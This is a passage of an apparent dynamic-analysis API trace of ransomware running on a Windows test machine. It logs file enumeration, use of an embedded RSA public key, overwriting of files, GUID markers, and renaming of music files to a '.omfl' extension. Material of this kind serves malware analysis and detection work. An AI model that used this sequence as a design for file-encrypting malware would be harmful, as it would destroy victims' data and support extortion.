[0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f98 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f98 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f98 | out: hHeap=0x4970000) returned 1 [0131.228] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0131.228] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0131.229] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fc8 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fb0 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f80 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f68 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd34a58 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.229] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.230] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x16fce, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x16fce, lpOverlapped=0x0) returned 1 [0131.230] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.230] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x16fd3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.230] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.231] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.231] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0131.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.231] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0131.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0131.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.231] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.231] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.231] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.231] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.232] CloseHandle (hObject=0x5c8) returned 1 [0131.233] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.233] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0131.234] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FbcE9Yewc0.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbce9yewc0.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FbcE9Yewc0.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbce9yewc0.m4a.omfl")) returned 1 [0131.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.234] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.234] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.236] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0131.236] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe632e020, ftCreationTime.dwHighDateTime=0x1d5dead, ftLastAccessTime.dwLowDateTime=0x332430c0, ftLastAccessTime.dwHighDateTime=0x1d5e2b7, ftLastWriteTime.dwLowDateTime=0x332430c0, ftLastWriteTime.dwHighDateTime=0x1d5e2b7, nFileSizeHigh=0x0, nFileSizeLow=0xb780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gqyKwI3O.m4a", cAlternateFileName="")) returned 1 [0131.236] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.236] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.236] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.236] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gqyKwI3O.m4a") returned=".m4a" [0131.236] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gqyKwI3O.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gqykwi3o.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.236] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=46976) returned 1 [0131.237] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.239] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xb75a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.240] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.241] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.241] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.241] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xb780, lpOverlapped=0x0) returned 1 [0131.241] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.241] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.241] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.241] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.242] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.242] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.242] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.242] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.243] GetLastError () returned 0x0 [0131.243] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.243] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.243] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.243] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.243] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.243] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.243] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.243] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb780) returned 0xdd35410 [0131.243] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34a58 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f68 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34aa0 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f80 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16fb0 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16fc8 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.244] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fb0 | out: hHeap=0x4970000) returned 1 [0131.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fc8 | out: hHeap=0x4970000) returned 1 [0131.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16fc8 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16fb0 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.244] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fc8 | out: hHeap=0x4970000) returned 1 [0131.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fb0 | out: hHeap=0x4970000) returned 1 [0131.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.245] GetCurrentThreadId () returned 0x618 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2cfa0 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.245] GetCurrentThreadId () returned 0x618 [0131.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.246] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.246] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.246] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.246] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.246] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0131.246] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.246] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.247] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xb780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.247] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.247] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.247] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.247] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.247] CloseHandle (hObject=0x5c8) returned 1 [0131.254] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gqyKwI3O.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gqykwi3o.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gqyKwI3O.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gqykwi3o.m4a.omfl")) returned 1 [0131.255] HeapFree (in: 